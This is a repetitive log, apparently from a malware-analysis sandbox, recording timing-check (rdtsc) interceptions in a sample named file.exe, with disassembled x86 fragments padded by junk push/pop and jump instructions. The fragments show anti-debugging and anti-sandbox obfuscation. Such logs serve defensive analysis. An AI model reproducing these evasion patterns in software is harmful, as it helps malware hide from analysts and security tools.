Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6A7F second address: 9D6AAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAA4EF80D6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6AAB second address: 9D6AAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6F62 second address: 9D6FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007FFAA4EF80CAh 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 xchg eax, esi 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FFAA4EF80C8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov di, 2F42h 0x00000031 pushad 0x00000032 mov dword ptr [ebp+122D261Ch], edx 0x00000038 call 00007FFAA4EF80D3h 0x0000003d sub dword ptr [ebp+122D2596h], esi 0x00000043 pop ebx 0x00000044 popad 0x00000045 nop 0x00000046 jp 00007FFAA4EF80D7h 0x0000004c jmp 00007FFAA4EF80D1h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jno 00007FFAA4EF80C8h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D770B second address: 9D773E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dx, si 0x0000000f push 0000001Eh 0x00000011 mov ecx, dword ptr [ebp+122D20F0h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FFAA4B0AF1Fh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D782C second address: 9D784B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7AC7 second address: 9D7ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7ACB second address: 9D7B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FFAA4EF80C8h 0x0000000c popad 0x0000000d nop 0x0000000e add ecx, 73F2E24Dh 0x00000014 lea eax, dword ptr [ebp+124845C1h] 0x0000001a call 00007FFAA4EF80D3h 0x0000001f adc edx, 25D1EAA4h 0x00000025 pop edi 0x00000026 nop 0x00000027 push edx 0x00000028 push ebx 0x00000029 jng 00007FFAA4EF80C6h 0x0000002f pop ebx 0x00000030 pop edx 0x00000031 push eax 0x00000032 jnl 00007FFAA4EF80CEh 0x00000038 nop 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007FFAA4EF80C8h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 mov di, B139h 0x00000057 sub dword ptr [ebp+122D27E1h], ebx 0x0000005d lea eax, dword ptr [ebp+1248457Dh] 0x00000063 jmp 00007FFAA4EF80D8h 0x00000068 nop 0x00000069 js 00007FFAA4EF80CEh 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7B6C second address: 9C13CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007FFAA4B0AF25h 0x0000000b nop 0x0000000c and di, 57F1h 0x00000011 call dword ptr [ebp+122D2569h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1F5FE second address: A1F61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4EF80D8h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1F78F second address: A1F795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1F950 second address: A1F96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFAA4EF80D8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1FAA9 second address: A1FAB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1FAB3 second address: A1FAD8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFAA4EF80C6h 0x00000008 jmp 00007FFAA4EF80D8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1FC19 second address: A1FC1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1FC1D second address: A1FC3B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFAA4EF80C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FFAA4EF80CCh 0x00000010 jp 00007FFAA4EF80C6h 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007FFAA4EF80C6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1FC3B second address: A1FC6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FFAA4B0AF21h 0x0000000e jl 00007FFAA4B0AF16h 0x00000014 pop ebx 0x00000015 popad 0x00000016 jc 00007FFAA4B0AF22h 0x0000001c jp 00007FFAA4B0AF1Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1FD8B second address: A1FDAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4EF80D9h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1FDAB second address: A1FDD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4B0AF20h 0x00000009 jmp 00007FFAA4B0AF24h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A22AAB second address: A22AE7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FFAA4EF80D3h 0x00000008 jnp 00007FFAA4EF80C6h 0x0000000e pop ebx 0x0000000f jmp 00007FFAA4EF80D7h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A22AE7 second address: A22AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A22AFF second address: A22B0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FFAA4EF80C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A24D33 second address: A24D37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A24D37 second address: A24D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A280DA second address: A280DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A280DE second address: A280E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2D07C second address: A2D082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2D082 second address: A2D086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2D086 second address: A2D0A2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFAA4B0AF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FFAA4B0AF1Dh 0x0000000f push ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2D0A2 second address: A2D0C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAA4EF80D7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2D0C1 second address: A2D0E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAA4B0AF23h 0x00000008 jmp 00007FFAA4B0AF1Ch 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2C698 second address: A2C6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FFAA4EF80C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2C980 second address: A2C99E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFAA4B0AF28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2C99E second address: A2C9AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FFAA4EF80C6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32830 second address: A3284F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4B0AF29h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3284F second address: A3287D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CEh 0x00000007 jmp 00007FFAA4EF80D9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3287D second address: A32892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF1Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32892 second address: A328B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FFAA4EF80D9h 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A329F4 second address: A329FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A329FF second address: A32A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32B85 second address: A32B8A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32B8A second address: A32B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32B95 second address: A32B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32E24 second address: A32E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32E2A second address: A32E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A330AD second address: A330D1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAA4EF80C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FFAA4EF80D7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A330D1 second address: A330F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c jl 00007FFAA4B0AF16h 0x00000012 jg 00007FFAA4B0AF16h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A330F0 second address: A330F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A33A18 second address: A33A1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A38194 second address: A3819F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3DC83 second address: A3DC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3DC87 second address: A3DCA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3DCA0 second address: A3DCA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3DE1A second address: A3DE1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3DE1E second address: A3DE2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF1Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3DF99 second address: A3DFD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4EF80D7h 0x00000009 popad 0x0000000a pushad 0x0000000b jc 00007FFAA4EF80C6h 0x00000011 jmp 00007FFAA4EF80CAh 0x00000016 popad 0x00000017 jo 00007FFAA4EF80CEh 0x0000001d push esi 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3EA8E second address: A3EA94 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3EA94 second address: A3EAAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FFAA4EF80CEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3F666 second address: A3F66A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3F66A second address: A3F66E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3F66E second address: A3F674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A44151 second address: A44157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A49184 second address: A491A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A522B3 second address: A522CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D5h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 996A05 second address: 996A1D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFAA4B0AF22h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 996A1D second address: 996A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FFAA4EF80C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A50570 second address: A50578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A50578 second address: A5057E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5057E second address: A50582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5088F second address: A508A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A50B77 second address: A50B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A50F90 second address: A50FA4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFAA4EF80CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A50FA4 second address: A50FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A510B6 second address: A510BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A510BC second address: A510C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A510C2 second address: A51108 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFAA4EF80D1h 0x00000010 jbe 00007FFAA4EF80DFh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A51287 second address: A512B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Bh 0x00000007 jmp 00007FFAA4B0AF27h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 ja 00007FFAA4B0AF16h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A512B9 second address: A512C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jc 00007FFAA4EF80C6h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A512C7 second address: A512D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A512D9 second address: A512DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A52116 second address: A52123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 ja 00007FFAA4B0AF27h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A52123 second address: A52144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4EF80CBh 0x00000009 jmp 00007FFAA4EF80CDh 0x0000000e popad 0x0000000f pushad 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4FF00 second address: A4FF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A58DE4 second address: A58E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FFAA4EF80D3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A589D2 second address: A589D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5A5D7 second address: A5A5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5A5DB second address: A5A5E7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFAA4B0AF16h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5A5E7 second address: A5A5F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5A417 second address: A5A42B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFAA4B0AF16h 0x00000008 jg 00007FFAA4B0AF16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5A42B second address: A5A42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5A42F second address: A5A435 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69BC7 second address: A69BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69733 second address: A6975A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jne 00007FFAA4B0AF16h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A73C25 second address: A73C4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FFAA4EF80D6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
